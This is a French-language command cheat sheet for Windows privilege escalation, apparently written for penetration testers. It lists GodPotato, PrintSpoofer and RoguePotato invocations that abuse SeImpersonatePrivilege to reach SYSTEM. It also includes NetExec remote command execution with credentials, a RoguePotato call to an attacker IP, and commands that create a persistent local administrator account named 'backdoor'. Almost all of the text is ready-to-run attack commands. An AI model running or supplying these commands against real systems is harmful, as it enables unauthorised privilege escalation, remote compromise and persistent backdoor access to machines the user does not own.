whoami /privDescription: Lister les privilèges du token courant : identifier SeImpersonatePrivilege ou SeAssignPrimaryTokenPrivilege.
Windows Privilege Escalation
GodPotato, PrintSpoofer et RoguePotato pour escalader SeImpersonatePrivilege vers SYSTEM.
whoami /privDescription: Lister les privilèges du token courant : identifier SeImpersonatePrivilege ou SeAssignPrimaryTokenPrivilege.
nxc smb $TARGET -u $USER -p $PASS -x 'whoami /priv'Description: Vérifier les privilèges à distance : SeImpersonate présent sur la plupart des comptes de service.
GodPotato.exe -cmd 'whoami'Description: GodPotato : exploitation de SeImpersonatePrivilege, compatible Windows Server 2012-2022.
GodPotato.exe -cmd 'net user backdoor Pass123! /add && net localgroup administrators backdoor /add'Description: Créer un admin local via GodPotato : accès SYSTEM pour ajout de compte persistant.
PrintSpoofer.exe -i -c cmdDescription: PrintSpoofer : escalade SeImpersonate vers SYSTEM via le Spooler (Windows 10/Server 2019).
RoguePotato.exe -r $ATTACKER_IP -e 'whoami' -l 9999Description: RoguePotato : alternative à JuicyPotato pour les environnements sans DCOM accessible.
nxc smb $TARGET -u $USER -p $PASS -x 'C:\Temp\PrintSpoofer.exe -c "net user backdoor Pass123! /add"'Description: Lancer PrintSpoofer à distance via NXC pour créer un admin sans session interactive.